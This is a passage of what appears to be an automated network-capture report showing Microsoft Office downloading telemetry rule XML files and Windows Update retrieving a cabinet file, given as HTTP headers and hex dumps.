                                Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                2024-12-03 16:51:07 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                2024-12-03 16:51:07 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                2024-12-03 16:51:07 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                2024-12-03 16:51:07 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                2024-12-03 16:51:07 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                2024-12-03 16:51:07 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                2024-12-03 16:51:07 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                Session IDSource IPSource PortDestination IPDestination Port
                                4192.168.2.54997013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:09 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 2980
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                ETag: "0x8DC582BA80D96A1"
                                x-ms-request-id: 663f4ef8-b01e-0053-4c19-44cdf8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f7845968frfdmhC1EWRxxbw000000167000000000h54w
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                Session IDSource IPSource PortDestination IPDestination Port
                                5192.168.2.54997113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:09 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 2160
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                ETag: "0x8DC582BA3B95D81"
                                x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f784596886s2bhC1EWR743w000000164g00000000tgz0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                6192.168.2.54996813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:09 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 3788
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                ETag: "0x8DC582BAC2126A6"
                                x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f7845968psccphC1EWRuz9s00000016eg00000000e579
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                Session IDSource IPSource PortDestination IPDestination Port
                                7192.168.2.54996913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:10 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 450
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                ETag: "0x8DC582BD4C869AE"
                                x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f78459685m244hC1EWRgp2c00000015y000000000tfgr
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                Session IDSource IPSource PortDestination IPDestination Port
                                8192.168.2.54997213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:10 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 408
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                ETag: "0x8DC582BB56D3AFB"
                                x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f78459685726chC1EWRsnbg00000016b0000000003emd
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.54996720.109.210.53443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:10 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                Host: slscr.update.microsoft.com
                                2024-12-03 16:51:10 UTC560INHTTP/1.1 200 OK
                                Cache-Control: no-cache
                                Pragma: no-cache
                                Content-Type: application/octet-stream
                                Expires: -1
                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                MS-CorrelationId: 9be24751-e792-4293-b12c-35362f715af2
                                MS-RequestId: fa3eed5a-a1e9-4c6a-a698-cb95a5a1f432
                                MS-CV: W147Fi1qP0eoclOI.0
                                X-Microsoft-SLSClientCache: 2880
                                Content-Disposition: attachment; filename=environment.cab
                                X-Content-Type-Options: nosniff
                                Date: Tue, 03 Dec 2024 16:51:09 GMT
                                Connection: close
                                Content-Length: 24490
                                2024-12-03 16:51:10 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                2024-12-03 16:51:10 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                Session IDSource IPSource PortDestination IPDestination Port
                                10192.168.2.54997513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:12 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                ETag: "0x8DC582B9F6F3512"
                                x-ms-request-id: 896d1f20-701e-0001-29ee-44b110000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968px8v7hC1EWR08ng00000016fg00000000apmd
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
